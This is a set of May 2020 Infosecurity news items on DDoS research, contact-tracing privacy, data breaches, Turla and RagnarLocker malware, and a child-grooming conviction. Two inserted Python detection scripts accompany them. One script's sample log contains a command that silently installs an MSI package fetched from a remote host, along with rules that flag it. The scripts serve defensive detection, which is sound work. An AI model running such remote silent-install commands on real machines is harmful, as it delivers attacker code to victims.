Cyber Risk News

DNS Traffic Analysis Detects Hidden DDoS Attacks

Info Security - Wed, 05/27/2020 - 10:03

New research has found a measurable increase in DNS cache miss traffic levels, and a number of previously unknown DDoS events.

According to Farsight Security, analysis of DNS cache miss traffic levels over the two-month period of March-April 2020 revealed “a macroscopic phenomenon.” The analysis was done over 300 domains for leading travel and transportation, retail, streaming video, higher education and news and partisan opinion sites.

Using its DNSDB intelligence solution, Farsight said that it looked at daily DNS transactions for over 300 sites and, when reviewing traffic for these sites, examined the DNS cache miss traffic for all hostnames under a given delegation point. This revealed some websites experiencing spikes in volume, which Farsight stated represent distributed denial of service (DDoS) attack traffic reflected off these sites' nameservers at unrelated third-party targets.

It said at least two distinct reflective DDoS attack patterns took place among the studied sites: one pattern type which appeared to be purely associated with abusive DNS SOA (Start of Authority) queries, and a second pattern type which melds abusive DNS SOA queries with abusive DNS TXT queries for wildcarded SPF redirect records.

Some sites also experienced spikes in volume so large that they caused most of the “normal variation” in traffic volume to “wash out” under the dominance of the spike or spikes.

Dr. Paul Vixie, chairman, CEO and co-founder of Farsight Security, said whilst headlines focused on a virus pandemic, most of the DNS traffic related to those headlines will be due to fraudulent or criminal activity by those hoping to cash in on the public's attention. “Therefore, it is worth our time to study DNS traffic patterns during every global event, to characterize current abuses of the system and to predict future abuses,” he said.

Farsight also discovered a step-up pattern in traffic, typically reflecting a four-to-seven-times increase in DNS cache miss traffic levels, across most or all verticals during the same period.

To reduce the risk of DDoS events, Farsight recommended that nameserver vendors ship their products with Response Rate Limiting (RRL) enabled by default. Farsight also recommended all authoritative name server operators confirm that their current configurations have RRL enabled. 
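A toy detector for the two signatures the article describes, added here as an example (it is not Farsight's or DNSDB's code): it aggregates per-day cache-miss query counts by zone and query type, flags spike days dominated by SOA or SOA+TXT queries, and measures the step-up in baseline volume once spike days are excluded. The record format, the sample zones and the thresholds are assumptions for this example.

```python
from collections import Counter, defaultdict
from statistics import median


def make_sample():
    """Constructed day-aggregated cache-miss records: 'date zone qtype count'."""
    lines = []
    for d in range(1, 15):
        date = f"2020-03-{d:02d}"
        # travel.test: steady ~1000/day, one SOA-only reflection spike on day 8
        lines += [f"{date} travel.test A 900", f"{date} travel.test AAAA 80",
                  f"{date} travel.test MX 20"]
        if d == 8:
            lines.append(f"{date} travel.test SOA 60000")
        # retail.test: steady, one mixed SOA+TXT spike on day 10
        lines += [f"{date} retail.test A 1500", f"{date} retail.test TXT 40"]
        if d == 10:
            lines += [f"{date} retail.test SOA 30000",
                      f"{date} retail.test TXT 20000"]
        # news.test: baseline steps up roughly 5x from day 8 onwards
        lines.append(f"{date} news.test A {1000 if d < 8 else 5000}")
    return lines


def parse(lines):
    """Return {zone: {date: Counter(qtype -> count)}}."""
    per_zone = defaultdict(lambda: defaultdict(Counter))
    for line in lines:
        date, zone, qtype, count = line.split()
        per_zone[zone][date][qtype] += int(count)
    return per_zone


def find_spikes(days, factor=10, share=0.8):
    """Flag days whose total exceeds factor x the median daily volume and
    classify them by query-type mix: 'soa-only', 'soa+txt' or 'other'."""
    totals = {d: sum(c.values()) for d, c in days.items()}
    baseline = median(totals.values())  # the median is not pulled up by a single spike
    spikes = []
    for date in sorted(days):
        total = totals[date]
        if total < factor * baseline:
            continue
        soa = days[date].get("SOA", 0) / total
        txt = days[date].get("TXT", 0) / total
        if soa >= share:
            pattern = "soa-only"
        elif soa + txt >= share:
            pattern = "soa+txt"
        else:
            pattern = "other"
        spikes.append((date, total, pattern))
    return spikes


def step_up(days, spike_dates=()):
    """Ratio of second-half to first-half median daily volume, spike days excluded,
    so a sustained rise is measured rather than a one-day burst."""
    dates = [d for d in sorted(days) if d not in spike_dates]
    totals = [sum(days[d].values()) for d in dates]
    half = len(totals) // 2
    if half == 0:
        return 1.0
    return median(totals[half:]) / median(totals[:half])


def analyze(lines, factor=10, step_threshold=4.0):
    """Per-zone report: reflection spikes and whether baseline stepped up."""
    report = {}
    for zone, days in parse(lines).items():
        spikes = find_spikes(days, factor)
        ratio = step_up(days, {d for d, _, _ in spikes})
        report[zone] = {"spikes": spikes, "step_up": round(ratio, 2),
                        "stepped_up": ratio >= step_threshold}
    return report


if __name__ == "__main__":
    for zone, r in analyze(make_sample()).items():
        print(zone, r)
```

Real input would come from per-day aggregates of authoritative query logs or a passive DNS source; the thresholds (10x for a spike, 4x for a step-up) would need tuning per zone.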

Trump Election Tweet Labelled Fake News

Info Security - Wed, 05/27/2020 - 09:30

Donald Trump has decided to pick a fight with Twitter after one of his posts on the upcoming election was labelled misleading by the social media platform.

The original tweet claimed that Mail-In (postal) ballots during the November Presidential election would be “substantially fraudulent.”

The issue has become a partisan one of late, as Democrats push for voters to have the option of mailing in their votes to avoid the risk of COVID-19 infection at the polling booth. They claim that otherwise, millions of voters may be disenfranchised as they stay at home.

Many Republicans, including Trump, believe higher voter turnouts enabled by postal voting would give their opponents an advantage, as groups that would otherwise stay home are more likely to vote Democrat.

Twitter labelled Trump’s tweet with a clickable blue notification stating "get the facts about mail-in ballots," which takes them to a page debunking the false assertion that postal votes lead to election fraud.

Unsurprisingly, Trump hit back, branding Twitter’s response as stifling free speech and interfering in the 2020 election.

In fact, many commentators have argued that Twitter has been too easy on Trump in recent months and years, saying that his status and 80 million followers have given him carte blanche to say things that others would be blacklisted for.

Twitter’s decision can be seen in the context of its newly updated policy on misleading information. Because the propensity for harm was judged “moderate” in this case, the platform merely labelled Trump’s tweet, but if that rating is upped to “severe” then future posts could be removed.

Either way, the incident is likely to be just the first of many ahead of the election as Trump seeks to fire up his base with increasingly outlandish statements on social media.

UK Public Backlash Could Scupper #COVID19 App

Info Security - Wed, 05/27/2020 - 08:30

The UK’s plans to ease its COVID-19 lockdown have been thrown into doubt after half the public said it does not trust the government to handle their data collected via a key contact tracing app.

The app is a crucial part of the best practice “test, track and trace” strategy being rolled out around the world to help businesses and society get back to normal after weeks of social distancing.

“The NHS COVID-19 app automates the process of contact tracing,” noted the NHS. “Its goal is to reduce the transmission of the virus by alerting people who may have been exposed to the infection so they can take action to protect themselves, the people they care about and the NHS.”

It’s currently being trialled on the Isle of Wight ahead of a slated June 1 launch nationwide.

However, in a new survey of 1000 UK adults, Anomali found that 48% do not trust the government to keep the data collected by the app safe. A further 43% said they were concerned it would give hackers an opportunity to send phishing emails and texts — something only 52% said they felt savvy enough to be able to spot.

“It’s tough to predict the increase in the volume of attacks we’ll see. However, we’re already seeing thousands of rogue and spoof COVID-19 domains being registered and used in attacks,” Anomali head of EMEA, Jamie Stone, explained.

“Global interest around the virus, and each nation’s track-and-trace apps, means that attackers will likely use many of these domains to host phishing attacks via both email and SMS. People using COVID tracking apps need to be extremely vigilant and aware, ensuring that they’ve installed official government apps and that they are interacting with authentic messages from the agencies.”

Respondents also raised concerns about government surveillance: a third (33%) claimed the app may be able to track their whereabouts and 36% said that it may allow the government to collect data on them.

Unlike many being developed across Europe and elsewhere, the NHS app is said not to rely on the API developed by Apple and Google, which allows collected data to be stored on the user’s device.

Instead, it is centralized, although the NHS claimed that no personally identifiable data is collected, the app will conform to UK law, and that data “will only ever be used for NHS care, management, evaluation and research.”

For voluntary contact tracing apps like this one to make a meaningful contribution to “test, track and trace” they need to be downloaded and used by 80%+ of current smartphone users. That makes confidence in the government’s approach crucial.

Yet there is widespread suspicion of government surveillance and data misuse in the UK thanks to incidents like the Windrush scandal and 2016 legislation known as the Investigatory Powers Act, aka the Snooper’s Charter.

This has been compounded by recent events, in which the Prime Minister’s chief advisor, Dominic Cummings, was found to have driven over 250 miles during lockdown, breaking the guidelines he helped to draw up.

Deputy Sheriff Admits Cyberstalking Massachusetts Tween

Info Security - Tue, 05/26/2020 - 17:55

A former deputy sheriff has pleaded guilty to cyberstalking and sexually exploiting a teenage girl whom he met through playing Minecraft online. 

When 26-year-old Texan Pasquale T. Salas first encountered his victim in 2014, she was just 12 years old. 

Salas engineered a relationship with the child by sending her messages in private chat rooms. The former deputy sheriff with the Matagorda County Sheriff’s Office then systematically used Skype, Snapchat, and text messages to groom the little girl.

Authorities said that during their digital exchanges, Salas put repeated pressure on his tweenage victim to capture sexually explicit images of herself and send them to him. 

At his coercion, the victim sent hundreds of lewd videos and images of herself to Salas over a two-year period. Some of the images were sent as they communicated via Minecraft. 

In a sick attempt to make the exploitation appear like a genuine relationship, Salas sent his victim jewelry, Edible Arrangements, and iTunes gift cards and granted her access to his Amazon Prime account.

The exploited girl, who is from Worcester County, tried to break off contact with Salas in 2016. The self-confessed sexual predator responded by repeatedly threatening to send lewd images of the victim to her family and friends unless she kept communicating with him.

Salas used technology to control his victim. He manipulated her into granting him access to her Snapchat, then used a tracking option on the app to keep tabs on the girl's whereabouts. 

The girl was ordered to obey a list of rules written by Salas that dictated what she could wear and whom she could speak with. 

According to authorities, Salas threatened to harm the girl's sister if she disobeyed him. He also meted out punishments to his victim when she went against his wishes.

Salas told the girl, “You belong to me. You’re my property so I can treat you however I want, whenever I want.”

Authorities said a second female victim had been sexually exploited by Salas for four years. Victim number 2 was also aged 12 when she met Salas via Minecraft. 

Salas, who is in custody at the Donald W. Wyatt Detention Facility in Rhode Island, will be sentenced on September 3.

International Plea for Governments to Protect Healthcare from Cyber-Attacks

Info Security - Tue, 05/26/2020 - 17:07

A plea from the Cyber Peace Institute for healthcare providers to be protected against cyber-threats has attracted international support.

Major players in cybersecurity, academics, and numerous political movers and shakers have backed the call for governments to work together "with civil society and the private sector" to defend hospital, healthcare, and medical research facilities from digital assaults. 

In a strongly worded plea published May 26, the Cyber Peace Institute asked governments to assert in unequivocal terms that the targeting of healthcare facilities by cyber-criminals is both "unlawful and unacceptable."

"We call on the world’s governments to take immediate and decisive action to stop all cyberattacks on hospitals, healthcare and medical research facilities, as well as on medical personnel and international public health organizations," wrote the CPI. "To this end, governments should work together, including at the United Nations, to reaffirm and recommit to international rules that prohibit such actions."

The CPI highlighted recent cyber-assaults against healthcare providers around the world, cynically timed to coincide with the outbreak of COVID-19 in nearly every corner of the planet. 

"Over the past weeks, we have witnessed attacks that have targeted medical facilities and organizations on the frontlines of the response to the COVID-19 pandemic," wrote CPI. 

"These actions have endangered human lives by impairing the ability of these critical institutions to function, slowing down the distribution of essential supplies and information, and disrupting the delivery of care to patients." 

While the rate of deaths caused by the novel coronavirus continues to fall in some countries, bringing hope that the pandemic is ebbing, the CPI's plea warns against complacency.

"With hundreds of thousands of people already perished and millions infected around the world, medical care is more important than ever," wrote the CPI. "This will not be the last health crisis."

Political bigwigs who have signed the Institute's rallying call include former presidents of the Soviet Union, Uruguay, Brazil, Liberia, Chile, the Swiss Confederation, Mexico, Colombia, Denmark, Poland, and Slovenia, as well as former US secretary of state Madeleine Albright.

Signatories from the cybersecurity industry include Kaspersky CEO Eugene Kaspersky, Microsoft president Brad Smith, and Trend Micro CEO Eva Chen.

National Guard Helps Maryland with Cybersecurity

Info Security - Tue, 05/26/2020 - 16:12

The National Guard has been working to keep Maryland safe from cyber-attacks.

Maryland governor Larry Hogan called in the National Guard by executive order on March 12 to bolster the state's COVID-19 pandemic response. In addition to assisting the Old Line State with its coronavirus testing and screening program, the Guard has been helping out with cybersecurity assessments.

Baltimore, Maryland's largest city, was rocked by a catastrophic ransomware attack last year that prevented government officials from performing even basic tasks like sending an email. 

In an interview with Federal Computer Week, Colonel Reid Novotny, Maryland National Guard's joint staff (J6) lead for IT and cyber, said that surviving a major attack did not make Baltimore invulnerable to cyber-criminals. 

"During this crisis, we are in daily contact with them [in] an elevated status," said Novotny. “There have been ransomware attacks that have affected hospitals that are treating COVID patients."

Novotny wouldn't specify which hospitals had been targeted but said that attacks had been observed in Baltimore and Baltimore County.

"Yes, that stuff has actually happened, and the department of IT has responded back, and the Guard has supported that response," he said.

"Patients and the residents of that county that went to that hospital were assured that everyone was up and working."

The state's chief information security officer, Chip Stewart, said that malicious activity against Maryland had increased since the outbreak of COVID-19. 

"Maryland has noticed an increased frequency of attempted cyber-attacks as have many other states throughout the country, ranging from phishing emails to sophisticated attempts to bypass security measures," said Stewart.

To counter the threats, Maryland has established a security operations center to monitor attacks on its digital infrastructure.

According to Stewart, the National Guard is supporting the state's efforts to thwart cyber-attackers by performing "routine external assessments of the state's websites and networks to identify issues proactively."

As of May 15, the Maryland National Guard has supplied over 3,000 hours of support to four different state agencies across four of Maryland's counties. Novotny said the commercial value of the Guard's cyber-support was roughly $1m.

New Version of Turla Malware Poses Threat to Governments

Info Security - Tue, 05/26/2020 - 14:20

Details of a new version of the ComRAT backdoor, one of the oldest malware families run by the notorious cyber-espionage group Turla, have been outlined by ESET. The findings will be of particular concern for government agencies, such as militaries and diplomats, as this updated backdoor is able to use the Gmail web UI to receive commands and exfiltrate data in an attempt to steal confidential documents.

The Turla group, also referred to as ‘Snake,’ has been operating for at least 10 years, primarily targeting governments across Europe, Central Asia and the Middle East. It has breached a number of major organizations including the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014.

One method it uses to steal important information is the malicious backdoor ComRAT, which is believed to have been first released in 2007. “Based on the victimology and the other malware samples found on the same compromised machines, we believe that ComRAT is used exclusively by Turla,” noted Matthieu Faou, malware researcher at ESET.

ESET has found evidence that the fourth version of the malware, which has attacked at least three government institutions since 2017, was still active in January 2020. The operators used public cloud services such as OneDrive and 4shared to exfiltrate data.

The new version uses a completely new code base and is far more complex than earlier incarnations. It can perform a number of new actions on compromised computers, such as executing additional programs and exfiltrating files, whilst having unique abilities to evade security software.

“This shows the level of sophistication of this group and its intention to stay on the same machines for a long time,” explained Faou. “Additionally, the latest version of the ComRAT malware family, thanks to its use of the Gmail web interface, is able to bypass some security controls because it doesn’t rely on any malicious domain.”

Customized Android Builds Drive Global Security Inequality

Info Security - Tue, 05/26/2020 - 10:45

Security experts have warned that default regional settings and pre-loaded applications may be exposing Android devices in some countries to a greater risk of cyber-attack.

F-Secure claimed today that large numbers of pre-bundled apps can expand the attack surface of a device.

The impact is potentially worse when country-specific rules block access to Google Play, meaning that users have to rely on third-party stores curated by the phone manufacturers themselves.

F-Secure claimed it found multiple vulnerabilities in the Huawei AppGallery which could be used to “create a beachhead” to launch additional attacks, such as one targeting the Huawei iReader which could allow hackers to execute code and steal data from devices.

Meanwhile, a simple phishing email/message could be enough to compromise the default configuration on the Xiaomi Mi 9 for China, India, Russia and maybe other countries, the security vendor claimed.

In another case, the research team compromised a Samsung Galaxy S9 by exploiting the fact that the device changes its behavior according to which country issued the SIM inside it.

“To perform this attack, an adversary must manipulate an affected Galaxy S9 user into connecting to a Wi-Fi network under their control (such as by masquerading as free public Wi-Fi),” F-Secure explained.

“If the phone detects a Chinese SIM, the affected component accepts unencrypted updates, allowing an adversary to compromise the device with a man-in-the-middle attack. If successful, the attacker will have full control of the phone.”

F-Secure warned that as the number of customized Android builds grows, the white hat community needs to double down on research.

“It’s important for vendors to consider the security implications when they’re customizing Android for different regions,” added senior security consultant, Toby Drew.

“People in one region aren’t more or less entitled to security than another, and if you have the same device configured to provide a less secure experience to users in one region compared to another, it’s creating a type of inequality by increasing their exposure to attacks.”

Data on 29 Million Indian Jobseekers Leaked

Info Security - Tue, 05/26/2020 - 09:29

The personal details of over 29 million Indian jobseekers have been posted to a dark web site, free for anyone to access.

Cybersecurity firm Cyble, which discovered the trove on an unnamed hacking forum, has in turn added the compromised information to its breach notification site AmIBreached.

It claimed to have found the posting during a regular sweep of the dark and deep web. The 2.3GB file includes email, phone, home address, qualification, work experience, current salary, employer and other details on job-hunters from all over India.

“Cyber-criminals are always on the lookout for such personal information to conduct various nefarious activities such as identity thefts, scams and corporate espionage,” said Cyble.

The vendor claimed that the leak had originated from a CV aggregation service which collected the data from legitimate job portal sites. An update over the weekend clarified that the data may have been initially exposed by an unprotected Elasticsearch instance, subsequently made inaccessible.

It continues to investigate these claims.

In the meantime, it spotted another threat actor posting nearly 2000 Aadhaar identity cards for free onto a hacking forum. They appear to originate from Madhya Pradesh state.

Also over the weekend, Cyble claimed that three hacking forums have themselves been breached, exposing user details and private chats.

The firm said it had been able to obtain databases related to Sinful Site, SUXX.TO and Nulled.

“All these hacking forums are based on general discussion and sharing of related resources. It is a place where users can find lots of great data leaks, hacking and cracking tools, software, tutorials, and much more. Along with that, over here the users can also take part in active discussions and make new friends,” it explained.

Specifically, the firm now has detailed info on users of SUXX.TO and Nulled, which were dumped on May 20, and private messages from Sinful Site, which were leaked on May 15.

Lawyers Aim £18bn Class Action Suit at easyJet

Info Security - Tue, 05/26/2020 - 08:37

A specialist in group litigation has filed a potential £18bn class action claim against easyJet in London’s High Court, following the firm’s major data breach disclosure last week.

International law firm PGMBM said it had been contacted by “numerous affected people” and is urging more to come forward to join the case, which would pay out £2000 per impacted customer. 

It clarified that Article 82 of EU General Data Protection Regulation (GDPR) grants customers the right to compensation for inconvenience, distress, annoyance and loss of control of their personal data.

The Luton-headquartered airline revealed last week that a “highly sophisticated” attack on its IT infrastructure had compromised email addresses and travel details of nine million passengers, as well as the credit card details of just over 2200.

Despite claiming that it had no evidence that any of the stolen info had been misused, the airline warned those affected about follow-on phishing attacks.

Although it notified UK regulator the Information Commissioner’s Office (ICO) back in January, at around the time of the incident, it took several months for the firm to come clean to customers.

PGMBM has also claimed that the exposure of customers’ travel plans could pose security risks to those individuals, as well as being a gross invasion of privacy.

“This is a monumental data breach and a terrible failure of responsibility that has a serious impact on easyJet’s customers,” argued managing partner, Tom Goodhead.

“This is personal information that we trust companies with, and customers rightly expect that every effort is made to protect their privacy. Unfortunately, easyJet has leaked sensitive personal information of nine million customers from all around the world.”

The case highlights the potentially serious financial repercussions of a major data breach, on top of the large fines GDPR regulators can theoretically impose.

The ICO has come in for some criticism recently after reports emerged that it may be considering a significantly lower fine than the £183.4m figure posted in a notice of intent last summer, in response to a major breach at British Airways.

Mumbai Police Force Uses 'The Force' for Cyber-Safety Campaign

Info Security - Fri, 05/22/2020 - 16:19

Police in Mumbai have recruited Baby Yoda to help raise awareness of the importance of cyber-safety. 

The law enforcement agency has earned a reputation online for delivering serious messages with humorous memes via social media app Instagram. It only seems appropriate that the force should use the power of 'The Force' to drive home a warning that passwords should be kept private.

On Monday, Mumbai Police shared an image of a popular meme that uses characters from TV space Western series Star Wars: The Mandalorian. In the meme, the show's lone gun fighter shares an amusing exchange with the famous character Baby Yoda.

The meme shows the fighter telling Baby Yoda to close his eyes, after which he asks him, "What do you see, bro?"

Yoda shutters his peepers and replies, "Nothing, bro."

In an amusing edit to the next line of dialogue, Mumbai Police tweaked the meme so that the fighter tells Yoda: "That's your bank balance after you shared your password with me, bro."

Along with the meme, Mumbai Police shared the following caption with their 126K Instagram followers: "Share password, do not. There is no question of do."

The funny post was a hit with netizens who expressed their appreciation by filling the comments section with compliments. 

Instagram user rohitksp wrote, "Mumbai police is getting cooler day by day," while user tanabhy punned, "Mumbai police, Yoda best."

User dandekarvaibhav added: "Mumbai Police shared a Star Wars themed meme... My day is made."

User uppalakshit took the joke one step further, quipping, "That's the Bank balance during Lockdown..."

Not every heart was won by the force's attempt to raise awareness of cybersecurity in a humorous way. One user expressed the view that Mumbai police ought to be focusing their resources elsewhere. 

User ashwitha4real wrote in the comments: "Memes are great but there are groups on telegram that are sexually assaulting women, making videos and sharing it. Kindly do something about it."

At time of publication, the Baby Yoda post had garnered 23,291 likes on Instagram and attracted 209 comments.

North Dakota's Contact Tracing App Sends User Data to Third Parties

Info Security - Fri, 05/22/2020 - 15:14

A cybersecurity company has claimed that a contact tracing app introduced by North Dakota is sending data to third parties and exposing users' identities.

Like South Dakota and Utah, North Dakota has built its own contact-tracing app, Care19, in an effort to monitor the spread of the novel coronavirus.

Jumbo Privacy alleges that the Care19 app, created by ProudCrowd LLC to track the spread of COVID-19 in The Peace Garden State, is sharing user data with Foursquare and other third-party services.

Foursquare is a location service that provides advertisers with tools to reach audiences who have been at specific locations.

Users of the Care19 app are told in the privacy policy that their "location data is private to you and is stored securely on ProudCrowd, LLC servers. It will not be shared with anyone including government entities or third parties, unless you consent or ProudCrowd is compelled under federal regulations.”

North Dakota claims that users of the app cannot be individually identified. On the state's website in the app FAQ section it states that “the application does not have any information that is tied to an individual person” and information uploaded via the app is "100% anonymous." 

Jumbo disputes this assertion, claiming instead that users accessing the app via the iOS on their iPhone can be unmasked through the Identifier for Advertisers (IDFA) on their device. 

The IDFA is an advertising identifier that enables an advertiser to understand when a phone user has taken an action like a click or an app install.

"They share the IDFA with Foursquare, which means it’s not anonymous,” said Jumbo Privacy CEO Pierre Valade. "It’s a unique ID tied to your phone.”

Foursquare confirmed in a statement that it receives Care19 data. However, the company said it promptly discards the information sent via the app and doesn't use it for anything. 

The Care19 privacy policy indicates that “Your data is identified by an anonymous code.” Jumbo found that, along with the IDFA, this anonymous code was transmitted to Foursquare. The code was also being sent, together with the name given to the phone by the user (e.g., Paul's phone), to remote logger Bugfender.

Businesses Could Face Influx of Attacks When Offices Reopen

Info Security - Fri, 05/22/2020 - 15:00

Cyber-criminals could be poised to trigger a wave of attacks on businesses when workers return to offices and reconnect to corporate networks, Redscan has warned. As many countries such as the UK prepare to ease COVID-19 lockdown restrictions and allow more people to return to physical workplaces, the cybersecurity firm said organizations need to take action to defend themselves against potential hackers lying dormant on employee devices.

There has been a substantial rise in threat activity over recent months, with cyber-criminals looking to exploit the sudden rise in remote working during the pandemic and the resultant lack of protection. In this period, Redscan has observed a surge in activity such as malspam, external scanning attempts to identify weaknesses in the use of remote access tools and account login attempts from unknown locations.

It therefore believes there could be an influx of attacks when staff reconnect to company networks after returning to their workplaces, with attackers ready to launch attacks including ransomware across a company network. In order to prevent this situation occurring, Redscan said firms should sanitize all endpoints on the return to the office as well as closely monitor networks for evidence of compromises.

George Glass, head of threat intelligence at Redscan, said: “During the COVID-19 pandemic there has been a steady stream of organizations reporting cyber-attacks. However, this is only likely to be the tip of the iceberg. Many more organizations are certain to have been targeted without their knowledge.

“As employees return to work post-lockdown and connect directly to corporate networks, organizations need to be alert to the possibility that criminals could be lying dormant on employee devices, waiting for the opportunity to move laterally through a network, escalate privileges and deploy ransomware.”

Redscan provided other recommendations to companies to tackle this type of threat, including updating anti-virus signatures, connecting all devices to remote networks and educating staff about the latest risks.

Data Breach Afflicts Ohio’s Unemployment Office

Info Security - Fri, 05/22/2020 - 14:29

A data breach at the Ohio Department of Job and Family Services (ODJFS) has exposed the personal data of Pandemic Unemployment Assistance (PUA) claimants. 

Personal information including names, Social Security numbers, home addresses, and claim receipts was exposed to other claimants due to a security vulnerability detected by Deloitte Consulting on May 15. Deloitte is the technology vendor for PUA systems in several states, including Ohio. 

“A unique circumstance enabled about two dozen Pandemic Unemployment Assistance claimants to inadvertently access a restricted page when logged into the state’s PUA website,” Deloitte said in the statement.

In a breach notification email sent to PUA claimants on May 20, ODJFS said the breach was fixed within one hour of discovery. 

The department stated: “Over the weekend, Deloitte notified ODJFS that about two dozen individuals inadvertently had the capability to view other PUA claimants’ correspondence.” 

According to the department there is no evidence to suggest that any "widespread data compromise" had occurred. 

More than 161,000 Ohioans have applied for unemployment assistance offered in the wake of COVID-19. ODJFS has not revealed how many of these claimants were affected by the data breach. 

Perhaps tellingly, every single Ohioan who has claimed PUA is being offered free credit monitoring by Deloitte Consulting for 12 months.

“A unique circumstance enabled about two dozen Pandemic Unemployment Assistance claimants to inadvertently access a restricted page when logged into the state’s PUA website,” Deloitte said in a statement. "Within an hour of learning of this issue, we identified the cause and stopped the unauthorized access to prevent additional occurrences."

Frustrated claimants, some of whom are still waiting to receive financial assistance under the PUA program, reported the breach on social media. 

ODJFS said action had been taken to ensure that the data breach was a one-off.

The department stated: “ODJFS holds the confidentiality of claimant data in the highest regard and agreed with the immediate steps Deloitte took to prevent any unauthorized PUA access in the future."

Unemployment claims in Ohio since the start of the coronavirus crisis passed the 1 million mark at the end of April, putting pressure on an archaic system.

Categories: Cyber Risk News

Non-Cybersecurity Incidents Outnumber Cyber-Attacks in ICO Report

Info Security - Fri, 05/22/2020 - 11:15

The Information Commissioner’s Office (ICO) has disclosed that reported non-cyber incidents outweighed cyber-incidents in Q4 of 2019.

In its report on incident trends, the ICO said there were 2629 incidents reported to it in Q4 2019, of which 337 were due to “data emailed to incorrect recipient,” 265 were due to “data posted or faxed to incorrect recipient” and 213 were due to “loss/theft of paperwork or data left in insecure location.” Meanwhile, the main cyber-incidents were phishing (280) and unauthorized access (175).

The ICO also issued two fines. The first was £500,000 to DSG Retail Limited in January after a point-of-sale computer system was compromised in a cyber-attack, affecting at least 14 million people. Then, in March, the ICO fined Cathay Pacific Airways Limited £500,000 for failing to protect the security of its customers’ personal data: between October 2014 and May 2018, Cathay Pacific’s computer systems lacked appropriate security measures, which led to customers’ personal details being exposed.

ZIVVER’s CEO and founder Rick Goud pointed out the number of reported data leaks decreases every quarter in the UK, while other countries like Germany, the Netherlands, Denmark and Sweden have shown more than 50% increases. “Per inhabitant, the UK was already reporting about 10-times less data leaks than the 'top'-countries,” he said. “This is not due to less data leaks, but – instead – due to a decrease in reporting culture, possibly prompted by the lack of action shown by the ICO since GDPR came into force.”

In an email to Infosecurity, BH Consulting CEO Brian Honan said the report reinforces the fact that most security breaches are not due to “sophisticated attackers” but are the result of failings in basic security controls.

He added: “Accidental data leakage is one of the key sources for breaches and these can result from the lack of appropriate training to staff on how to handle and process data, from weak security controls that don’t prevent or alert to breaches, or a combination of both.

“Ensuring staff are properly trained in the handling and processing of personal data, the technologies they use as part of their daily work and have effective security awareness training is crucial to preventing these types of errors.”

Honan also pointed out that the blame cannot be solely put down to human error, and we need to ensure our systems and platforms provide staff with a safety net in the event they make a mistake. “This means security professionals also need to ensure the basics are covered and that systems are properly patched, effective email security to protect against phishing attacks and data leakage are in place, and that data is encrypted at rest and in transit,” he said.

“It is also important to remember that no matter what controls are in place a breach can still happen and that staff and the company need to be prepared on how to deal with it and know when and how to report breaches to the ICO, or any other relevant Data Protection Supervisory Authorities or other regulatory bodies.”

Categories: Cyber Risk News

RagnarLocker Ransomware Hides in Virtual Machine to Escape Detection

Info Security - Fri, 05/22/2020 - 10:45

Security researchers are warning of a new ransomware attack technique which deploys the malware as a virtual machine (VM) in order to evade traditional defenses.

Sophos revealed that it recently detected a RagnarLocker attack in which the ransomware was hidden inside an Oracle VirtualBox Windows XP VM.

It said the attack payload was a 122MB installer, with a 282MB virtual image inside concealing a 49KB executable.

“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” Sophos director of engineering, Mark Loman, explained.

The MSI package contained an Oracle VirtualBox hypervisor and a virtual disk image file (VDI) named micro.vdi, which was an image of a stripped-down version of the Windows XP SP3 operating system.

“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” said Loman.

The attack appears to have been highly targeted, as the ransom note contained the victim’s name.

RagnarLocker has been in action recently, after it was deployed against Portuguese energy giant Energias de Portugal (EDP) group in an attack demanding a payment of €10m ($11m).

As Loman explained, the group behind the ransomware typically targets managed service providers (MSPs) and exploits holes in Windows Remote Desktop Protocol (RDP) to gain a foothold into organizations.

“After gaining administrator-level access to the domain of a target and exfiltration of data, they have used native Windows administrative tools such as Powershell and Windows Group Policy Objects (GPOs) to move laterally across the network to Windows clients and servers,” he said.
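As an added detection example (not code from Sophos or from the original article), the following Python flags process-creation records matching the delivery pattern described above: msiexec.exe silently installing a package from a remote URL, and a VirtualBox process started by an installer or script rather than by a user's shell. The record format, the sample lines, the documentation IP address and the parent-process heuristic are all assumptions constructed for this example.

```python
import re
from typing import List, Tuple

# Constructed sample process-creation records for this example, in an assumed
# simplified "user|parent_image|image_path|command_line" format.
SAMPLE_LOG = [
    "CORP\\svc_gpo|svchost.exe|C:\\Windows\\System32\\msiexec.exe|"
    "msiexec.exe /i http://203.0.113.10/pkg/update.msi /q",
    "CORP\\alice|explorer.exe|C:\\Windows\\System32\\msiexec.exe|"
    "msiexec.exe /i C:\\Users\\alice\\Downloads\\editor.msi",
    "CORP\\bob|cmd.exe|C:\\Windows\\System32\\msiexec.exe|"
    "msiexec.exe /x {PRODUCT-GUID} /qn",
    "SYSTEM|msiexec.exe|C:\\Program Files\\Oracle\\VirtualBox\\VBoxHeadless.exe|"
    "VBoxHeadless.exe --startvm micro",
]

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
INSTALL_SWITCHES = {"/i", "-i", "/package", "-package"}
# Parents suggesting a hypervisor launched by an installer or script (heuristic assumption).
SCRIPTED_PARENTS = {"msiexec.exe", "cmd.exe", "powershell.exe", "wscript.exe"}


def msiexec_remote_silent(cmdline: str) -> bool:
    """True when msiexec is told to install a package from a URL together with a
    quiet switch (/q, /qn, /quiet ...), i.e. a silent install from a remote server."""
    args = cmdline.split()  # constructed sample lines contain no quoted spaces
    if not args or args[0].strip('"').lower() not in ("msiexec", "msiexec.exe"):
        return False
    low = [a.lower() for a in args[1:]]
    from_url = any(
        a in INSTALL_SWITCHES and i + 1 < len(low) and URL_RE.match(low[i + 1])
        for i, a in enumerate(low)
    )
    quiet = any(a.startswith(("/q", "-q")) for a in low)
    return from_url and quiet


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (severity, reason, record) for each record matching a pattern."""
    findings = []
    for record in lines:
        _user, parent, image, cmd = record.split("|", 3)
        image_name = image.rsplit("\\", 1)[-1].lower()
        if image_name == "msiexec.exe" and msiexec_remote_silent(cmd):
            findings.append(("high", "silent msiexec install from remote URL", record))
        elif image_name.startswith("vbox") and parent.lower() in SCRIPTED_PARENTS:
            findings.append(("medium", "VirtualBox process started by installer/script", record))
    return findings


if __name__ == "__main__":
    for severity, reason, record in scan(SAMPLE_LOG):
        print(f"[{severity}] {reason}: {record}")
```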

Categories: Cyber Risk News

